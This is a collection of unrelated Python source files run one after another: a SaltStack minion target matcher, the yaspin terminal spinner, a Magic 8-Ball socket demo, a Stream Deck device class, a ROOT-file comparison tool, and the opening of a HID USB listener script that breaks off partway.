self.functions['data.getval'](comps[0]) if val is None: # The value is not defined return False if isinstance(val, list): # We are matching a single component to a single list member for member in val: if fnmatch.fnmatch(str(member).lower(), comps[1].lower()): return True return False if isinstance(val, dict): if comps[1] in val: return True return False return bool(fnmatch.fnmatch( val, comps[1], )) def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM): ''' Reads in the pillar glob match ''' log.debug('pillar target: {0}'.format(tgt)) if delimiter not in tgt: log.error('Got insufficient arguments for pillar match ' 'statement from master') return False return salt.utils.subdict_match( self.opts['pillar'], tgt, delimiter=delimiter ) def pillar_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM): ''' Reads in the pillar pcre match ''' log.debug('pillar PCRE target: {0}'.format(tgt)) if delimiter not in tgt: log.error('Got insufficient arguments for pillar PCRE match ' 'statement from master') return False return salt.utils.subdict_match( self.opts['pillar'], tgt, delimiter=delimiter, regex_match=True ) def pillar_exact_match(self, tgt, delimiter=':'): ''' Reads in the pillar match, no globbing, no PCRE ''' log.debug('pillar target: {0}'.format(tgt)) if delimiter not in tgt: log.error('Got insufficient arguments for pillar match ' 'statement from master') return False return salt.utils.subdict_match(self.opts['pillar'], tgt, delimiter=delimiter, exact_match=True) def ipcidr_match(self, tgt): ''' Matches based on IP address or CIDR notation ''' try: tgt = ipaddress.ip_network(tgt) # Target is a network proto = 'ipv{0}'.format(tgt.version) if proto not in self.opts['grains']: return False else: return salt.utils.network.in_subnet(tgt, self.opts['grains'][proto]) except: # pylint: disable=bare-except try: # Target should be an address proto = 'ipv{0}'.format(ipaddress.ip_address(tgt).version) if proto not in self.opts['grains']: return False else: return tgt in self.opts['grains'][proto] except: # pylint: disable=bare-except log.error('Invalid IP/CIDR target {0}"'.format(tgt)) return False def range_match(self, tgt): ''' Matches based on range cluster ''' if HAS_RANGE: range_ = seco.range.Range(self.opts['range_server']) try: return self.opts['grains']['fqdn'] in range_.expand(tgt) except seco.range.RangeException as exc: log.debug('Range exception in compound match: {0}'.format(exc)) return False return False def compound_match(self, tgt): ''' Runs the compound target check ''' if not isinstance(tgt, six.string_types) and not isinstance(tgt, (list, tuple)): log.error('Compound target received that is neither string, list nor tuple') return False log.debug('compound_match: {0} ? {1}'.format(self.opts['id'], tgt)) ref = {'G': 'grain', 'P': 'grain_pcre', 'I': 'pillar', 'J': 'pillar_pcre', 'L': 'list', 'N': None, # Nodegroups should already be expanded 'S': 'ipcidr', 'E': 'pcre'} if HAS_RANGE: ref['R'] = 'range' results = [] opers = ['and', 'or', 'not', '(', ')'] if isinstance(tgt, six.string_types): words = tgt.split() else: words = tgt for word in words: target_info = salt.utils.minions.parse_target(word) # Easy check first if word in opers: if results: if results[-1] == '(' and word in ('and', 'or'): log.error('Invalid beginning operator after "(": {0}'.format(word)) return False if word == 'not': if not results[-1] in ('and', 'or', '('): results.append('and') results.append(word) else: # seq start with binary oper, fail if word not in ['(', 'not']: log.error('Invalid beginning operator: {0}'.format(word)) return False results.append(word) elif target_info and target_info['engine']: if 'N' == target_info['engine']: # Nodegroups should already be expanded/resolved to other engines log.error('Detected nodegroup expansion failure of "{0}"'.format(word)) return False engine = ref.get(target_info['engine']) if not engine: # If an unknown engine is called at any time, fail out log.error('Unrecognized target engine "{0}" for' ' target expression "{1}"'.format( target_info['engine'], word, ) ) return False engine_args = [target_info['pattern']] engine_kwargs = {} if target_info['delimiter']: engine_kwargs['delimiter'] = target_info['delimiter'] results.append( str(getattr(self, '{0}_match'.format(engine))(*engine_args, **engine_kwargs)) ) else: # The match is not explicitly defined, evaluate it as a glob results.append(str(self.glob_match(word))) results = ' '.join(results) log.debug('compound_match {0} ? "{1}" => "{2}"'.format(self.opts['id'], tgt, results)) try: return eval(results) # pylint: disable=W0123 except Exception: log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results)) return False return False def nodegroup_match(self, tgt, nodegroups): ''' This is a compatibility matcher and is NOT called when using nodegroups for remote execution, but is called when the nodegroups matcher is used in states ''' if tgt in nodegroups: return self.compound_match( salt.utils.minions.nodegroup_comp(tgt, nodegroups) ) return False class ProxyMinion(Minion): ''' This class instantiates a 'proxy' minion--a minion that does not manipulate the host it runs on, but instead manipulates a device that cannot run a minion. ''' # TODO: better name... @tornado.gen.coroutine def _post_master_init(self, master): ''' Function to finish init after connecting to a master This is primarily loading modules, pillars, etc. (since they need to know which master they connected to) ''' log.debug("subclassed _post_master_init") self.opts['master'] = master self.opts['pillar'] = yield salt.pillar.get_async_pillar( self.opts, self.opts['grains'], self.opts['id'], self.opts['environment'], pillarenv=self.opts.get('pillarenv'), ).compile_pillar() if 'proxy' not in self.opts['pillar']: log.error('No proxy key found in pillar for id '+self.opts['id']+'.') log.error('Check your pillar configuration and contents. Salt-proxy aborted.') self._running = False raise SaltSystemExit(code=-1) fq_proxyname = self.opts['pillar']['proxy']['proxytype'] self.opts['proxy'] = self.opts['pillar']['proxy'] # We need to do this again, because we are going to throw out a lot of grains. self.opts['grains'] = salt.loader.grains(self.opts) self.opts['proxymodule'] = salt.loader.proxy(self.opts, None, loaded_base_name=fq_proxyname) self.functions, self.returners, self.function_errors, self.executors = self._load_modules() if ('{0}.init'.format(fq_proxyname) not in self.opts['proxymodule'] or '{0}.shutdown'.format(fq_proxyname) not in self.opts['proxymodule']): log.error('Proxymodule {0} is missing an init() or a shutdown() or both.'.format(fq_proxyname)) log.error('Check your proxymodule. Salt-proxy aborted.') self._running = False raise SaltSystemExit(code=-1) proxy_fn = self.opts['proxymodule'].loaded_base_name + '.init' self.opts['proxymodule'][proxy_fn](self.opts) # reload ?!? self.serial = salt.payload.Serial(self.opts) self.mod_opts = self._prep_mod_opts() self.matcher = Matcher(self.opts, self.functions) self.beacons = salt.beacons.Beacon(self.opts, self.functions) uid = salt.utils.get_uid(user=self.opts.get('user', None)) self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid) self.schedule = salt.utils.schedule.Schedule( self.opts, self.functions, self.returners) # add default scheduling jobs to the minions scheduler if 'mine.update' in self.functions: log.info('Added mine.update to scheduler') self.schedule.add_job({ '__mine_interval': { 'function': 'mine.update', 'minutes': self.opts['mine_interval'], 'jid_include': True, 'maxrunning': 2 } }, persist=True) # add master_alive job if enabled if self.opts['master_alive_interval'] > 0: self.schedule.add_job({ '__master_alive': { 'function': 'status.master', 'seconds': self.opts['master_alive_interval'], 'jid_include': True, 'maxrunning': 1, 'kwargs': {'master': self.opts['master'], 'connected': True} } }, persist=True) self.grains_cache = self.opts['grains']
core.py
# :copyright: (c) 2021 by Pavlo Dmytrenko. # :license: MIT, see LICENSE for more details. """ yaspin.yaspin ~~~~~~~~~~~~~ A lightweight terminal spinner. """ import contextlib import datetime import functools import itertools import signal import sys import threading import time from typing import List, Set, Union from termcolor import colored from .base_spinner import Spinner, default_spinner from .constants import COLOR_ATTRS, COLOR_MAP, SPINNER_ATTRS from .helpers import to_unicode class Yaspin: # pylint: disable=useless-object-inheritance,too-many-instance-attributes """Implements a context manager that spawns a thread to write spinner frames into a tty (stdout) during context execution. """ # When Python finds its output attached to a terminal, # it sets the sys.stdout.encoding attribute to the terminal's encoding. # The print statement's handler will automatically encode unicode # arguments into bytes. def __init__( # pylint: disable=too-many-arguments self, spinner=None, text="", color=None, on_color=None, attrs=None, reversal=False, side="left", sigmap=None, timer=False, ): # Spinner self._spinner = self._set_spinner(spinner) self._frames = self._set_frames(self._spinner, reversal) self._interval = self._set_interval(self._spinner) self._cycle = self._set_cycle(self._frames) # Color Specification self._color = self._set_color(color) if color else color self._on_color = self._set_on_color(on_color) if on_color else on_color self._attrs = self._set_attrs(attrs) if attrs else set() self._color_func = self._compose_color_func() # Other self._text = text self._side = self._set_side(side) self._reversal = reversal self._timer = timer self._start_time = None self._stop_time = None # Helper flags self._stop_spin = None self._hide_spin = None self._spin_thread = None self._last_frame = None self._stdout_lock = threading.Lock() self._hidden_level = 0 # Signals # In Python 2 signal.SIG* are of type int. # In Python 3 signal.SIG* are enums. # # Signal = Union[enum.Enum, int] # SigHandler = Union[enum.Enum, Callable] self._sigmap = sigmap if sigmap else {} # Dict[Signal, SigHandler] # Maps signals to their default handlers in order to reset # custom handlers set by ``sigmap`` at the cleanup phase. self._dfl_sigmap = {} # Dict[Signal, SigHandler] # # Dunders # def __repr__(self): return "<Yaspin frames={0!s}>".format(self._frames) def __enter__(self): self.start() return self def __exit__(self, exc_type, exc_val, traceback): # Avoid stop() execution for the 2nd time if self._spin_thread.is_alive(): self.stop() return False # nothing is handled def __call__(self, fn): @functools.wraps(fn) def inner(*args, **kwargs): with self: return fn(*args, **kwargs) return inner def __getattr__(self, name): # CLI spinners if name in SPINNER_ATTRS: from .spinners import Spinners # pylint: disable=import-outside-toplevel sp = getattr(Spinners, name) self.spinner = sp # Color Attributes: "color", "on_color", "attrs" elif name in COLOR_ATTRS: attr_type = COLOR_MAP[name] # Call appropriate property setters; # _color_func is updated automatically by setters. if attr_type == "attrs": self.attrs = [name] # calls property setter if attr_type in ("color", "on_color"): setattr(self, attr_type, name) # calls property setter # Side: "left" or "right" elif name in ("left", "right"): self.side = name # calls property setter # Common error for unsupported attributes else: raise AttributeError( "'{0}' object has no attribute: '{1}'".format( self.__class__.__name__, name ) ) return self # # Properties # @property def spinner(self): return self._spinner @spinner.setter def spinner(self, sp): self._spinner = self._set_spinner(sp) self._frames = self._set_frames(self._spinner, self._reversal) self._interval = self._set_interval(self._spinner) self._cycle = self._set_cycle(self._frames) @property def text(self): return self._text @text.setter def text(self, txt): self._text = txt @property def color(self): return self._color @color.setter def color(self, value): self._color = self._set_color(value) if value else value self._color_func = self._compose_color_func() # update @property def on_color(self): return self._on_color @on_color.setter def on_color(self, value): self._on_color = self._set_on_color(value) if value else value self._color_func = self._compose_color_func() # update @property def attrs(self): return list(self._attrs) @attrs.setter def attrs(self, value): new_attrs = self._set_attrs(value) if value else set() self._attrs = self._attrs.union(new_attrs) self._color_func = self._compose_color_func() # update @property def side(self): return self._side @side.setter def side(self, value): self._side = self._set_side(value) @property def reversal(self): return self._reversal @reversal.setter def reversal(self, value): self._reversal = value self._frames = self._set_frames(self._spinner, self._reversal) self._cycle = self._set_cycle(self._frames) @property def elapsed_time(self): if self._start_time is None: return 0 if self._stop_time is None: return time.time() - self._start_time return self._stop_time - self._start_time # # Public # def start(self): if self._sigmap: self._register_signal_handlers() if sys.stdout.isatty(): self._hide_cursor() self._start_time = time.time() self._stop_time = None # Reset value to properly calculate subsequent spinner starts (if any) # pylint: disable=line-too-long self._stop_spin = threading.Event() self._hide_spin = threading.Event() self._spin_thread = threading.Thread(target=self._spin) self._spin_thread.start() def stop(self): self._stop_time = time.time() if self._dfl_sigmap: # Reset registered signal handlers to default ones self._reset_signal_handlers() if self._spin_thread: self._stop_spin.set() self._spin_thread.join() sys.stdout.write("\r") self._clear_line() if sys.stdout.isatty(): self._show_cursor() def hide(self): """Hide the spinner to allow for custom writing to the terminal.""" thr_is_alive = self._spin_thread and self._spin_thread.is_alive() if thr_is_alive and not self._hide_spin.is_set(): with self._stdout_lock: # set the hidden spinner flag self._hide_spin.set() # clear the current line sys.stdout.write("\r") self._clear_line() # flush the stdout buffer so the current line # can be rewritten to sys.stdout.flush() @contextlib.contextmanager def hidden(self): """Hide the spinner within a block, can be nested""" if self._hidden_level == 0: self.hide() self._hidden_level += 1 try: yield finally: self._hidden_level -= 1 if self._hidden_level == 0: self.show() def show(self): """Show the hidden spinner.""" thr_is_alive = self._spin_thread and self._spin_thread.is_alive() if thr_is_alive and self._hide_spin.is_set(): with self._stdout_lock: # clear the hidden spinner flag self._hide_spin.clear() # clear the current line so the spinner is not appended to it sys.stdout.write("\r") self._clear_line() def write(self, text): """Write text in the terminal without breaking the spinner.""" # similar to tqdm.write() # https://pypi.python.org/pypi/tqdm#writing-messages with self._stdout_lock: sys.stdout.write("\r") self._clear_line() if isinstance(text, (str, bytes)): _text = to_unicode(text) else: _text = str(text) # Ensure output is Unicode assert isinstance(_text, str) sys.stdout.write("{0}\n".format(_text)) def ok(self, text="OK"): """Set Ok (success) finalizer to a spinner.""" _text = text if text else "OK" self._freeze(_text) def fail(self, text="FAIL"): """Set fail finalizer to a spinner.""" _text = text if text else "FAIL" self._freeze(_text) # # Protected # def _freeze(self, final_text): """Stop spinner, compose last frame and 'freeze' it.""" text = to_unicode(final_text) self._last_frame = self._compose_out(text, mode="last") # Should be stopped here, otherwise prints after # self._freeze call will mess up the spinner self.stop() with self._stdout_lock: sys.stdout.write(self._last_frame) def _spin(self): while not self._stop_spin.is_set(): if self._hide_spin.is_set(): # Wait a bit to avoid wasting cycles time.sleep(self._interval) continue # Compose output spin_phase = next(self._cycle) out = self._compose_out(spin_phase) # Write with self._stdout_lock: sys.stdout.write(out) self._clear_line() sys.stdout.flush() # Wait self._stop_spin.wait(self._interval) def _compose_color_func(self): return functools.partial( colored, color=self._color, on_color=self._on_color, attrs=list(self._attrs), ) def _compose_out(self, frame, mode=None): # Ensure Unicode input assert isinstance(frame, str) assert isinstance(self._text, str) text = self._text # Colors if self._color_func is not None: frame = self._color_func(frame) # Position if self._side == "right": frame, text = text, frame if self._timer: sec, fsec = divmod(round(100 * self.elapsed_time), 100) text += " ({}.{:02.0f})".format(datetime.timedelta(seconds=sec), fsec) # Mode if not mode: out = "\r{0} {1}".format(frame, text) else: out = "{0} {1}\n".format(frame, text) # Ensure output is Unicode assert isinstance(out, str) return out def _register_signal_handlers(self): # SIGKILL cannot be caught or ignored, and the receiving # process cannot perform any clean-up upon receiving this # signal. if signal.SIGKILL in self._sigmap.keys(): raise ValueError( "Trying to set handler for SIGKILL signal. " "SIGKILL cannot be cought or ignored in POSIX systems." ) for sig, sig_handler in self._sigmap.items(): # A handler for a particular signal, once set, remains # installed until it is explicitly reset. Store default # signal handlers for subsequent reset at cleanup phase. dfl_handler = signal.getsignal(sig) self._dfl_sigmap[sig] = dfl_handler # ``signal.SIG_DFL`` and ``signal.SIG_IGN`` are also valid # signal handlers and are not callables. if callable(sig_handler): # ``signal.signal`` accepts handler function which is # called with two arguments: signal number and the # interrupted stack frame. ``functools.partial`` solves # the problem of passing spinner instance into the handler # function. sig_handler = functools.partial(sig_handler, spinner=self) signal.signal(sig, sig_handler) def _reset_signal_handlers(self): for sig, sig_handler in self._dfl_sigmap.items(): signal.signal(sig, sig_handler) # # Static # @staticmethod def _set_color(value: str) -> str: available_values = [k for k, v in COLOR_MAP.items() if v == "color"] if value not in available_values: raise ValueError( "'{0}': unsupported color value. Use one of the: {1}".format( value, ", ".join(available_values) ) ) return value @staticmethod def _set_on_color(value: str) -> str: available_values = [k for k, v in COLOR_MAP.items() if v == "on_color"] if value not in available_values: raise ValueError( "'{0}': unsupported on_color value. " "Use one of the: {1}".format(value, ", ".join(available_values)) ) return value @staticmethod def _set_attrs(attrs: List[str]) -> Set[str]: available_values = [k for k, v in COLOR_MAP.items() if v == "attrs"] for attr in attrs: if attr not in available_values: raise ValueError( "'{0}': unsupported attribute value. " "Use one of the: {1}".format(attr, ", ".join(available_values)) ) return set(attrs) @staticmethod def _set_spinner(spinner): if hasattr(spinner, "frames") and hasattr(spinner, "interval"): if not spinner.frames or not spinner.interval: sp = default_spinner else: sp = spinner else: sp = default_spinner return sp @staticmethod def _set_side(side: str) -> str: if side not in ("left", "right"): raise ValueError( "'{0}': unsupported side value. " "Use either 'left' or 'right'." ) return side @staticmethod def _set_frames(spinner: Spinner, reversal: bool) -> Union[str, List]: uframes = None # unicode frames uframes_seq = None # sequence of unicode frames if isinstance(spinner.frames, str): uframes = spinner.frames # TODO (pavdmyt): support any type that implements iterable if isinstance(spinner.frames, (list, tuple)): # Empty ``spinner.frames`` is handled by ``Yaspin._set_spinner`` if spinner.frames and isinstance(spinner.frames[0], bytes): uframes_seq = [to_unicode(frame) for frame in spinner.frames] else: uframes_seq = spinner.frames _frames = uframes or uframes_seq if not _frames: # Empty ``spinner.frames`` is handled by ``Yaspin._set_spinner``. # This code is very unlikely to be executed. However, it's still # here to be on a safe side. raise ValueError("{0!r}: no frames found in spinner".format(spinner)) # Builtin ``reversed`` returns reverse iterator, # which adds unnecessary difficulty for returning # unicode value; # Hence using [::-1] syntax frames = _frames[::-1] if reversal else _frames return frames @staticmethod def _set_interval(spinner): # Milliseconds to Seconds return spinner.interval * 0.001 @staticmethod def _set_cycle(frames): return itertools.cycle(frames) @staticmethod def _hide_cursor(): sys.stdout.write("\033[?25l") sys.stdout.flush() @staticmethod def _show_cursor(): sys.stdout.write("\033[?25h") sys.stdout.flush() @staticmethod def _clear_line(): sys.stdout.write("\033[K")
cli.py
""" Project: python_assessment_3 Author: Diego C. <20026893@tafe.wa.edu.au> Created at: 10/11/2020 9:52 pm File: cli.py """ import sys import threading import time import task_b.server.server as server import task_b.client.client as client HOST = '127.0.0.1' PORT = 5555 def get_user_input(): """Gets user input.""" inp = input('Your question: ') while not inp.strip(): print('Invalid input, please try again\n') inp = input('Your question: ') return inp def print_header(): """Presents initial information about this program and captures user input. :return: Question asked by user """ print('\nWelcome! Ask the Magic 8-Ball a question below:') print('Enter "q" to quit the application\n') q = get_user_input() print() return q def start(): """Entry point of this program. Two threads are created whenever a question is asked - one for the server and another one for the client. This prevents blocking the main thread of the program with sockets and simulates real client-server handshakes. """ q = print_header() while q.strip().lower() != 'q': server_thread = threading.Thread(name='Server thread', target=server.listen, args=(HOST, PORT)) server_thread.start() print(f'{server_thread.name} started...waiting for connections...') client_thread = threading.Thread(name='Client thread', target=client.request, args=(q, HOST, PORT)) print(f'{client_thread.name} starting...sending request with question...\n') time.sleep(1) client_thread.start() client_thread.join() sys.stdout.flush() sys.stdin.flush() q = print_header() print('Bye!\n')
StreamDeck.py
# Python Stream Deck Library # Released under the MIT license # # dean [at] fourwalledcubicle [dot] com # www.fourwalledcubicle.com # import threading import time from abc import ABC, abstractmethod from ..Transport.Transport import TransportError class StreamDeck(ABC): """ Represents a physically attached original StreamDeck device. """ KEY_COUNT = None KEY_COLS = None KEY_ROWS = None KEY_PIXEL_WIDTH = None KEY_PIXEL_HEIGHT = None KEY_IMAGE_CODEC = None KEY_FLIP = None KEY_ROTATION = None DECK_TYPE = None def __init__(self, device): self.device = device self.last_key_states = [False] * self.KEY_COUNT self.read_thread = None self.run_read_thread = False self.key_callback = None self.update_lock = threading.RLock() def __del__(self): """ Delete handler for the StreamDeck, automatically closing the transport if it is currently open and terminating the transport reader thread. """ try: self._setup_reader(None) except (TransportError, ValueError): pass try: self.device.close() except (TransportError): pass def __enter__(self): """ Enter handler for the StreamDeck, taking the exclusive update lock on the deck. This can be used in a `with` statement to ensure that only one thread is currently updating the deck, even if it is doing multiple operations (e.g. setting the image on multiple keys). """ self.update_lock.acquire() def __exit__(self, type, value, traceback): """ Exit handler for the StreamDeck, releasing the exclusive update lock on the deck. """ self.update_lock.release() @abstractmethod def _read_key_states(self): """ Reads the raw key states from an attached StreamDeck. :rtype: list(bool) :return: List containing the raw key states. """ pass @abstractmethod def _reset_key_stream(self): """ Sends a blank key report to the StreamDeck, resetting the key image streamer in the device. This prevents previously started partial key writes that were not completed from corrupting images sent from this application. """ pass def _extract_string(self, data): """ Extracts out a human-readable string from a collection of raw bytes, removing any trailing whitespace or NUL bytes. """ return str(bytes(data), 'utf-8').rstrip(' \0') def _read(self): """ Read handler for the underlying transport, listening for button state changes on the underlying device, caching the new states and firing off any registered callbacks. """ while self.run_read_thread: try: new_key_states = self._read_key_states() if new_key_states is None: time.sleep(.05) continue if self.key_callback is not None: for k, (old, new) in enumerate(zip(self.last_key_states, new_key_states)): if old != new: self.key_callback(self, k, new) self.last_key_states = new_key_states except (TransportError): self.run_read_thread = False def _setup_reader(self, callback): """ Sets up the internal transport reader thread with the given callback, for asynchronous processing of HID events from the device. If the thread already exists, it is terminated and restarted with the new callback function. :param function callback: Callback to run on the reader thread. """ if self.read_thread is not None: self.run_read_thread = False self.read_thread.join() if callback is not None: self.run_read_thread = True self.read_thread = threading.Thread(target=callback) self.read_thread.daemon = True self.read_thread.start() def open(self): """ Opens the device for input/output. This must be called prior to setting or retrieving any device state. .. seealso:: See :func:`~StreamDeck.close` for the corresponding close method. """ self.device.open() self._reset_key_stream() self._setup_reader(self._read) def close(self): """ Closes the device for input/output. .. seealso:: See :func:`~StreamDeck.open` for the corresponding open method. """ self.device.close() def connected(self): """ Indicates if the physical StreamDeck device this instance is attached to is still connected to the host. :rtype: bool :return: `True` if the deck is still connected, `False` otherwise. """ return self.device.connected() def id(self): """ Retrieves the physical ID of the attached StreamDeck. This can be used to differentiate one StreamDeck from another. :rtype: str :return: Identifier for the attached device. """ return self.device.path() def key_count(self): """ Retrieves number of physical buttons on the attached StreamDeck device. :rtype: int :return: Number of physical buttons. """ return self.KEY_COUNT def deck_type(self): """ Retrieves the model of Stream Deck. :rtype: str :return: Text corresponding to the specific type of the device. """ return self.DECK_TYPE def key_layout(self): """ Retrieves the physical button layout on the attached StreamDeck device. :rtype: (int, int) :return (rows, columns): Number of button rows and columns. """ return self.KEY_ROWS, self.KEY_COLS def key_image_format(self): """ Retrieves the image format accepted by the attached StreamDeck device. Images should be given in this format when setting an image on a button. .. seealso:: See :func:`~StreamDeck.set_key_image` method to update the image displayed on a StreamDeck button. :rtype: dict() :return: Dictionary describing the various image parameters (size, image format, image mirroring and rotation). """ return { 'size': (self.KEY_PIXEL_WIDTH, self.KEY_PIXEL_HEIGHT), 'format': self.KEY_IMAGE_FORMAT, 'flip': self.KEY_FLIP, 'rotation': self.KEY_ROTATION, } def set_key_callback(self, callback): """ Sets the callback function called each time a button on the StreamDeck changes state (either pressed, or released). .. note:: This callback will be fired from an internal reader thread. Ensure that the given callback function is thread-safe. .. note:: Only one callback can be registered at one time. .. seealso:: See :func:`~StreamDeck.set_key_callback_async` method for a version compatible with Python 3 `asyncio` asynchronous functions. :param function callback: Callback function to fire each time a button state changes. """ self.key_callback = callback def set_key_callback_async(self, async_callback, loop=None): """ Sets the asynchronous callback function called each time a button on the StreamDeck changes state (either pressed, or released). The given callback should be compatible with Python 3's `asyncio` routines. .. note:: The asynchronous callback will be fired in a thread-safe manner. .. note:: This will override the callback (if any) set by :func:`~StreamDeck.set_key_callback`. :param function async_callback: Asynchronous callback function to fire each time a button state changes. :param function loop: Asyncio loop to dispatch the callback into """ import asyncio loop = loop or asyncio.get_event_loop() def callback(*args): asyncio.run_coroutine_threadsafe(async_callback(*args), loop) self.set_key_callback(callback) def key_states(self): """ Retrieves the current states of the buttons on the StreamDeck. :rtype: list(bool) :return: List describing the current states of each of the buttons on the device (`True` if the button is being pressed, `False` otherwise). """ return self.last_key_states @abstractmethod def reset(self): """ Resets the StreamDeck, clearing all button images and showing the standby image. """ pass @abstractmethod def set_brightness(self, percent): """ Sets the global screen brightness of the StreamDeck, across all the physical buttons. :param int/float percent: brightness percent, from [0-100] as an `int`, or normalized to [0.0-1.0] as a `float`. """ pass @abstractmethod def get_serial_number(self): """ Gets the serial number of the attached StreamDeck. :rtype: str :return: String containing the serial number of the attached device. """ pass @abstractmethod def get_firmware_version(self): """ Gets the firmware version of the attached StreamDeck. :rtype: str :return: String containing the firmware version of the attached device. """ pass @abstractmethod def set_key_image(self, key, image): """ Sets the image of a button on the StreamDeck to the given image. The image being set should be in the correct format for the device, as an enumerable collection of bytes. .. seealso:: See :func:`~StreamDeck.get_key_image_format` method for information on the image format accepted by the device. :param int key: Index of the button whose image is to be updated. :param enumerable image: Raw data of the image to set on the button. If `None`, the key will be cleared to a black color. """ pass
root_diff.py
"""Calculates the difference between two ROOT (https://root.cern.ch/) files. If a difference is present, the command will create plots for the distributions that differ. TODO: separate functionality: plotting, recursive reading of ROOT files, diff calculation TODO: allow for injection of user-defined high-level variables """ from __future__ import print_function import multiprocessing as mp import os import threading import awkward as ak import click from plumbum import colors from tqdm import tqdm from skvalidate import compare from skvalidate.vis import draw_diff from skvalidate.io import write_data_to_json def _process(name, values, output_path): color = colors.red msg = compare.ERROR status = values['status'] if status == compare.FAILED: try: image = draw_diff(name, values, output_path) values['image'] = image msg = 'FAILED (reason: {}): {}'.format(values['reason'], image) except TypeError as e: msg = 'ERROR: Cannot draw (value types: {0} & {1}, reason: {2})'.format( "NoneType" if values['original'] is None else str(ak.type(values['original'])), "NoneType" if values['reference'] is None else str(ak.type(values['reference'])), str(e), ) if status == compare.UNKNOWN or status == compare.WARNING: msg = 'WARNING: Unable to compare (value type: {0}, reason: {1})'.format( "Unknown" if values['original'] is None else str(ak.type(values['original'])), values['reason'], ) color = colors.Orange3 if status == compare.SUCCESS: msg = 'OK' color = colors.green values['msg'] = msg values['color'] = color del values['original'] del values['reference'] del values['diff'] return values class MultiProcessStatus(object): def __init__(self, comparison, n_processes, output_path): self.comparison = comparison self.pool = mp.Pool(n_processes) self.n_cores = n_processes self.output_path = output_path self.n_comparisons = len(comparison) self.pbar = tqdm(self.n_comparisons) def runMultiProcessing(self): print('Testing {0} distributions'.format(self.n_comparisons)) results = {} for name in sorted(self.comparison.keys()): result = self.pool.apply_async( _process, args=(name, self.comparison[name], self.output_path), callback=self._update, ) results[name] = result self.pool.close() self.pool.join() for name in results.keys(): self.comparison[name] = results[name].get() def runSingleCore(self): print('Testing {0} distributions'.format(self.n_comparisons)) for name in sorted(self.comparison.keys()): result = _process(name, self.comparison[name], self.output_path) self.comparison[name] = result def run(self): if self.n_cores > 1: self.runMultiProcessing() else: self.runSingleCore() def runMultiThread(self): print('Testing {0} distributions'.format(self.n_comparisons)) threads = {} for name in sorted(self.comparison.keys()): thread = threading.Thread(target=_process, args=(name, self.comparison[name], self.output_path)) thread.daemon = True thread.start() threads[name] = thread for name, thread in threads.items(): thread.join() self._update() self.comparison[name] = thread.values def _update(self, *a): self.pbar.update() def terminate(self): self.pool.terminate() self.pool.join() @click.command() @click.argument('file_under_test', type=click.Path(exists=True)) @click.argument('reference_file', type=click.Path(exists=True)) @click.option('-o', '--output-path', type=click.Path(exists=True), required=True) @click.option('-r', '--report-file', type=click.Path(), default='root_comparison.json') @click.option('-p', '--prefix', default=os.environ.get('CI_JOB_NAME', 'root_diff')) @click.option('-n', '--n-cores', default=1, type=int, help='Experimental feature: use n number of cores') def cli(file_under_test, reference_file, output_path, report_file, prefix, n_cores): # TODO add verbosity setting # TODO: add parameter for distributions that are allowed to fail (e.g. timestamps) # TODO: throw error if any distribution fails summary = {} for name, comparison in compare.compare_two_root_files(file_under_test, reference_file): comparison = _reset_infinities(comparison) if comparison is None: continue result = _process(name, comparison, output_path) print(result['color'] | f'{name} - {result["msg"]}') del result['color'] # delete, as we cannot JSON it summary[name] = result # processing = MultiProcessStatus(comparison, n_cores, output_path) # try: # processing.run() # except KeyboardInterrupt: # processing.terminate() # summary = _add_summary(processing.comparison, prefix) summary = _add_summary(summary, prefix) summary[prefix]['output_path'] = output_path # TODO: print nice summary write_data_to_json(summary, report_file) def _reset_infinities(comparison): if 'original' not in comparison or 'reference' not in comparison: return None if 'str' in str(ak.type(comparison['original'])): return None if 'str' in str(ak.type(comparison['reference'])): return None return comparison def _add_summary(comparison, prefix): summary = {} summary['distributions'] = comparison summary[compare.FAILED] = [] summary[compare.UNKNOWN] = [] summary[compare.WARNING] = [] summary[compare.SUCCESS] = [] summary[compare.ERROR] = [] for name, values in comparison.items(): status = values['status'] summary[status].append(name) return {prefix: summary}
My_Listener.py
#!/usr/bin/python3 # C:\Work\Python\HID_Util\src\My_Listener.py from binascii import hexlify import sys import argparse import threading from time import perf_counter as timer import include_dll_path import hid import os from string_date_time import get_date_time from string_date_time import get_time # BOARD_TYPE_MAIN = 0, # BOARD_TYPE_JOYSTICKS = 1, # BOARD_TYPE_TOOLS_MASTER = 2, # BOARD_TYPE_STATION = 3, # BOARD_TYPE_SUITE2PRIPH = 4, # BOARD_TYPE_TOOLS_SLAVE = 5, # BOARD_TYPE_GBU = 6, # BOARD_TYPE_LAP = 7 # VENDOR_ID = 0x24b3 # Simbionix # PRODUCT_ID = 0x1005 # Simbionix MSP430 Controller # USB\VID_2047&PID_0302&REV_0200 VENDOR_ID = 0x2047 # Texas Instruments PRODUCT_ID = 0x0302 # Joystick. PRODUCT_ID_JOYSTICK = 0x0302 # Joystick. PRODUCT_ID_ROUTER = 0x0301 # Router PRODUCT_ID_STATION = 0x0304 PRODUCT_ID_LAP_NEW_CAMERA = 0x2005 # 2021_01_24 # USB\VID_24B3&PID_2005&REV_0200 # 0x24B3 = 9395 # 0x2005 = 8197 # VENDOR_ID = 0x24b3 # Simbionix # PRODUCT_ID = 0x2005 # LAP_NEW_CAMERA. PRODUCT_ID_types = { 0x0302: "BOARD_TYPE: Joystick/Universal", 0x0301: "BOARD_TYPE: Router/Main", 0x0304: "BOARD_TYPE: STATION", 0x0303: "BOARD_TYPE: TOOLS_MASTER", 0x0305: "BOARD_TYPE: SUITE2PRIPH", 0x0306: "BOARD_TYPE: TOOLS_SLAVE", 0x0307: "BOARD_TYPE: GBU", 0x0308: "BOARD_TYPE: LAP camera", 0x2005: "BOARD_TYPE: PRODUCT_ID_LAP_NEW_CAMERA", #board type is enforced in FW (descriptors.h) 0x1965: "yosi" } # FILE1_PATH = "log\hid_log.csv" FILE1_PATH = "log\Listener_" # log.csv" start_date_time = get_date_time() FILE1_PATH = FILE1_PATH + start_date_time + ".csv" print("Recording result at: ", FILE1_PATH, "\n") if not os.path.exists('log'): os.makedirs('log') # file1 = None # open recording log file: # file1 = open("C:\Work\Python\HID_Util\src\log\log.csv","w") file1 = open(FILE1_PATH,"w") # file1 = open("log\hid_log.csv","w") hid_util_fault = 0 print_every = 0 prev_gbu_counter = 0 prev_gbu_counter_change_time = 0 READ_SIZE = 64 # The size of the packet READ_TIMEOUT = 2 # 2ms WRITE_DATA = 